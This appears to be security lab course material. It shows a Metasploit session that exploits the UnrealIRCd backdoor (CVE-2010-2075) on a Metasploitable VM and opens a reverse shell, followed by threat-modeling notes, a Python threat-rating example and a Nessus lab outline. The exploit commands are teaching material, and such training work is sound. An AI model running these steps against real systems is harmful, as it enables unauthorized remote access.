msf exploit(unix/irc/unreal_ircd_3281_backdoor) > search cve-2010-2075
Matching Modules
================
Name                                        Disclosure Date  Rank       Description
----                                        ---------------  ----       -----------
exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution
- ‘use exploit/unix/irc/unreal_ircd_3281_backdoor’ gives the prompt:
msf exploit(unix/irc/unreal_ircd_3281_backdoor) >
- ‘info’ provides information on the payload. RHOST is not set
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2075
-
Vulnerabilities – UnrealIRCd Backdoor Detection
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOST 10.0.2.4
RHOST => 10.0.2.4
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP double handler on 10.0.2.15:4444
[*] 10.0.2.4:6667 - Connected to 10.0.2.4:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 10.0.2.4:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo NkKbs49F8lfv25Hf;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "NkKbs49F8lfv25Hf\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.0.2.15:4444 -> 10.0.2.4:60006) at 2018-06-28 12:20:03 -0400
-
Security Approach – Threat Modeling
Structured approach to identifying, quantifying, and addressing threats.
In threat modeling, we cover the three main elements:
• Assets: What valuable data and equipment should be secured?
• Threats: What may an attacker do to the system?
• Vulnerabilities: What flaws in the system allow an attacker to realize a threat?
Possible Steps to Threat Modeling
• Identify the Assets
• Describe the Architecture
• Break down the Applications
• Identify the Threats
• Document and Classify the Threats
• Rate the Threats
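The steps above stop at "rate the threats" without showing a rating; the following Python is an added example (not part of the workshop material) that carries the three elements of the slide (assets, threats, vulnerabilities) into a small model and works that step through. The 1-3 scales and the score (likelihood × impact × asset value) are an assumed scheme, not one the slide prescribes; the entries are constructed from the lab's own findings (rlogin, the NFS export, the UnrealIRCd backdoor). A threat that names an asset missing from the asset list is treated as a documentation gap and rejected rather than silently scored.

```python
"""A minimal threat model with the 'rate the threats' step worked through.
Added example; scales, scoring scheme and entries are assumptions."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Asset:
    name: str
    value: int          # 1 (low) .. 3 (high): how much losing it would hurt


@dataclass(frozen=True)
class Threat:
    description: str    # what an attacker may do
    asset: str          # name of the asset it targets
    vulnerability: str  # the flaw that lets the attacker realize the threat
    likelihood: int     # 1..3: how likely / easy it is
    impact: int         # 1..3: damage if it happens


def rate_threats(assets, threats):
    """Return [(score, threat)] highest first.  Score = likelihood * impact *
    asset value (assumed scheme).  A threat naming an undocumented asset is
    rejected: the 'identify the assets' step was skipped for it."""
    by_name = {a.name: a for a in assets}
    rated = []
    for t in threats:
        if t.asset not in by_name:
            raise ValueError(f"threat '{t.description}' names undocumented asset '{t.asset}'")
        rated.append((t.likelihood * t.impact * by_name[t.asset].value, t))
    rated.sort(key=lambda pair: pair[0], reverse=True)   # stable: ties keep input order
    return rated


# Constructed entries for the lab's Metasploitable host.
ASSETS = [
    Asset("server filesystem", 3),
    Asset("IRC service", 1),
]
THREATS = [
    Threat("log in as root without a password", "server filesystem",
           "rlogin trusts the remote host", likelihood=3, impact=3),
    Threat("read or modify any file over the network", "server filesystem",
           "NFS exports '/' to every client", likelihood=2, impact=3),
    Threat("run commands on the host through the IRC daemon", "IRC service",
           "UnrealIRCd backdoor (CVE-2010-2075)", likelihood=3, impact=3),
]

if __name__ == "__main__":
    for score, t in rate_threats(ASSETS, THREATS):
        print(f"{score:3d}  {t.description}  [{t.vulnerability}]")
```

The ordering is the output of the "rate the threats" step: it tells the team which vulnerability to remediate first, and the rejected-asset check is what makes the "identify the assets" and "document the threats" steps enforceable rather than advisory.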
-
Lab 1.3
Nessus Scan – Metasploitable
Look at Vulnerabilities
2 Vulnerabilities without Metasploit
Metasploit Commands
2 Vulnerabilities with Metasploit